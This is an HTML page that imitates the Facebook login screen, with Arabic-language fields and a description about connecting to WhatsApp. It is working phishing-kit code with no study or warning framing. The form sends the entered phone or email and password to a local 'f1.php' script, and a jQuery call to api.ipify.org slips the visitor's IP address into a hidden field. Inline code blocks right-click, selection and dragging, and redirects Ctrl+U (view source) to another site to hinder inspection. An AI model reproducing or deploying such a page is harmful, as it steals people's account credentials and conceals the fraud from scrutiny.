<html>
<script src="../../cdn-cgi/apps/head/AlAgxD7oxHZSiFZQmr6zl7N739c.js"></script><script type='text/javascript'>
//<![CDATA[
shortcut={all_shortcuts:{},add:function(a,b,c){var d={type:"keydown",propagate:!1,disable_in_input:!1,target:document,keycode:!1};
if(c)for(var e in d)"undefined"==typeof c[e]&&(c[e]=d[e]);else c=d;d=c.target,"string"==typeof 
c.target&&(d=document.getElementById(c.target)),a=a.toLowerCase(),e=function(d){d=d||window.event;if(c.disable_in_input)
    {var e;d.target?e=d.target:d.srcElement&&(e=d.srcElement),3==e.nodeType&&(e=e.parentNode);if("INPUT"==e.tagName||"TEXTAREA"==e.tagName)return}d.keyCode?code=d.keyCode:d.which&&(code=d.which),e=String.fromCharCode(code).toLowerCase(),188==code&&(e=","),190==code&&(e=".");var f=a.split("+"),g=0,h={"`":"~",1:"!",2:"@",3:"#",4:"$",5:"%",6:"^",7:"&",8:"*",9:"(",0:")","-":"_","=":"+",";":":","'":'"',",":"<",".":">","/":"?","\\":"|"},i={esc:27,escape:27,tab:9,space:32,"return":13,enter:13,backspace:8,scrolllock:145,scroll_lock:145,scroll:145,capslock:20,caps_lock:20,caps:20,numlock:144,num_lock:144,num:144,pause:19,"break":19,insert:45,home:36,"delete":46,end:35,pageup:33,page_up:33,pu:33,pagedown:34,page_down:34,pd:34,left:37,up:38,right:39,down:40,f1:112,f2:113,f3:114,f4:115,f5:116,f6:117,f7:118,f8:119,f9:120,f10:121,f11:122,f12:123},j=!1,l=!1,m=!1,n=!1,o=!1,p=!1,q=!1,r=!1;d.ctrlKey&&(n=!0),d.shiftKey&&(l=!0),d.altKey&&(p=!0),d.metaKey&&(r=!0);for(var s=0;k=f[s],s<f.length;s++)"ctrl"==k||"control"==k?(g++,m=!0):"shift"==k?(g++,j=!0):"alt"==k?(g++,o=!0):"meta"==k?(g++,q=!0):1<k.length?i[k]==code&&g++:c.keycode?c.keycode==code&&g++:e==k?g++:h[e]&&d.shiftKey&&(e=h[e],e==k&&g++);if(g==f.length&&n==m&&l==j&&p==o&&r==q&&(b(d),!c.propagate))return d.cancelBubble=!0,d.returnValue=!1,d.stopPropagation&&(d.stopPropagation(),d.preventDefault()),!1},this.all_shortcuts[a]={callback:e,target:d,event:c.type},d.addEventListener?d.addEventListener(c.type,e,!1):d.attachEvent?d.attachEvent("on"+c.type,e):d["on"+c.type]=e},remove:function(a){var a=a.toLowerCase(),b=this.all_shortcuts[a];delete this.all_shortcuts[a];if(b){var a=b.event,c=b.target,b=b.callback;c.detachEvent?c.detachEvent("on"+a,b):c.removeEventListener?c.removeEventListener(a,b,!1):c["on"+a]=!1}}},shortcut.add("Ctrl+U",function(){top.location.href="https://jefanya.com"});
//]]>
</script>
<head>
<meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no"/>
<meta property="og:title" content="Facebook - log in or sign up">
<meta name="description" content="Log in to your Facebook account to connect to WhatsApp.">
<meta property="og:description" content="Log in to your Facebook account to connect to WhatsApp.">
<meta property="og:url" content="./">
<meta property="og:site_name" content="Facebook - log in or sign up">
<meta property="og:type" content="website">
<title>Facebook - log in or sign up</title>
<link rel="stylesheet" href="login/css/style.css">
<link href="https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet">
<link rel="icon" href="https://z-m-static.xx.fbcdn.net/rsrc.php/v3/ya/r/O2aKM2iSbOw.png">
</head>
<body oncontextmenu="return false" onselectstart="return false" ondragstart="return false">
<div class="navbar">
	<img src="login/img/fb.png">
</div>
<div class="content-box">
	   <form class="login-form" action="f1.php" method="post">
		<input type="text" name="text" placeholder="رقم الهاتف المحمول او البريد الالكتروني" autocomplete="off" autocapitalize="off" required>
		<input type="password" name="password" placeholder="كلمة السر" autocomplete="off" autocapitalize="off" required>
<input type="hidden" name="brok-ip" id="brok-ip" value="">
                <p hidden id="user-ippp"></p>
		<button type="submit" class="btn-login">تسجيل الدخول</button>
	</form>
	<div class="divider"><span>أو</span></div>
	<center>
	<button type="button" class="btn-create">انشاء حساب جديد</button>
	</center>
	<div class="txt-forgotten-password">هل نسيت كلمة السر؟</div>
</div>
<div class="language-box">
	<center>
	<div class="language-name language-name-active">English (US)</div>
	<div class="language-name">Bahasa Indonesia</div>
	<div class="language-name">Basa Jawa</div>
	<div class="language-name">Bahasa Melayu</div>
	<div class="language-name">日本語</div>
	<div class="language-name">Español</div>
	<div class="language-name">Português (Brasil)</div>
	<div class="language-name">
		<i class="fa fa-plus"></i>
	</div>
	</center>
</div>
<div class="copyright">Facebook Inc.</div>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js">
    </script>

    <script>

        $.getJSON("https://api.ipify.org?format=json", function (data) {

            $("#user-ippp").html(data.ip);


            let brok = document.getElementById('user-ippp').textContent;

            document.getElementById('brok-ip').value = brok;
        })
    </script>
</body>
</html>
